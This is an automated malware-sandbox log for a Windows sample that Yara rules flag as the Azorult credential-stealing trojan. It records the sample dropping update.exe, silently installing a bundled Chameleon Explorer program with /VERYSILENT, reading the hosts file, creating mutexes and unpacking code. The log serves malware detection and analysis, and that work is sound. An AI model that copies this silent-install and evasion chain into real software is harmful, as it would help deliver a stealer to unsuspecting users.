                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B1215 NtProtectVirtualMemory,3_2_007B1215
                      Source: cexplorer.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: cexplorer.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: is-89A92.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: is-89A92.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.327456967.0000000001CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEe vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.327456967.0000000001CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHIVE vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342568623.00000000047D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEI vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324292117.0000000001EDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324292117.0000000001EDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.328061216.0000000001CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEe vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.328061216.0000000001CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHIVE vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323901796.00000000047B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEI vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324239185.0000000001ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324239185.0000000001ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.380200036.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.380200036.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323886701.0000000001EC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323886701.0000000001EC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340275075.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340275075.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.381487636.00000000047DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEI vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.334621742.0000000001CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEe vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.334621742.0000000001CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHIVE vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                      Source: Chameleon Explorer.lnk.2.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: Chameleon Explorer.lnk0.2.drLNK file: ..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Roaming\cexplorer.exe
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@30/46@5/5
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: .csproj
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.0000000005272000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .slnpE(
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.0000000005272000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .csprojpE(
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeVirustotal: Detection: 71%
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregisterJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /updateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /updateJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Local\Temp\autEDA4.tmpJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3236:120:WilError_01
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeMutant created: \Sessions\1\BaseNamedObjects\ChameleonFolderMiddleClick
                      Source: C:\Users\user\AppData\Roaming\update.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-F23129DC-7702651A9
                      Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp, type: DROPPED
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpWindow found: window name: TMainFormJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic file information: File size 8148480 > 1048576
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x6fb000
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      Source: C:\Users\user\AppData\Roaming\update.exeUnpacked PE file: 20.2.update.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0565152C push ecx; mov dword ptr [esp], edx2_2_0565152D
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568D518 push ecx; mov dword ptr [esp], edx2_2_0568D519
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0562ADA4 push ecx; mov dword ptr [esp], eax2_2_0562ADA5
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650420 push ecx; mov dword ptr [esp], ecx2_2_05650424
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650CC0 push ecx; mov dword ptr [esp], ecx2_2_05650CC4
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0561AF6C push 0561B005h; ret 2_2_0561AFFD
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05629F40 push ecx; mov dword ptr [esp], eax2_2_05629F41
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564DFF0 push ecx; mov dword ptr [esp], ecx2_2_0564DFF4
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_056507A4 push ecx; mov dword ptr [esp], edx2_2_056507A5
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564F7A8 push ecx; mov dword ptr [esp], edx2_2_0564F7A9
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564FFB8 push ecx; mov dword ptr [esp], ecx2_2_0564FFBC
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650794 push ecx; mov dword ptr [esp], edx2_2_05650795
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0566061C push 0566067Eh; ret 2_2_05660676
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564FEC4 push ecx; mov dword ptr [esp], edx2_2_0564FEC5
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05689EC8 push ecx; mov dword ptr [esp], edx2_2_05689EC9
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05626EC0 push ecx; mov dword ptr [esp], ecx2_2_05626EC3
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564FED4 push ecx; mov dword ptr [esp], edx2_2_0564FED5
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564EED8 push ecx; mov dword ptr [esp], ecx2_2_0564EEDC
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568BE90 push ecx; mov dword ptr [esp], ecx2_2_0568BE94
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568E150 push ecx; mov dword ptr [esp], edx2_2_0568E151
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05689154 push 05689233h; ret 2_2_0568922B
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0561E9D8 push 0561EAC3h; ret 2_2_0561EABB
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_056511DC push ecx; mov dword ptr [esp], edx2_2_056511DD
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564F86C push ecx; mov dword ptr [esp], ecx2_2_0564F870
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0565182C push ecx; mov dword ptr [esp], edx2_2_0565182D
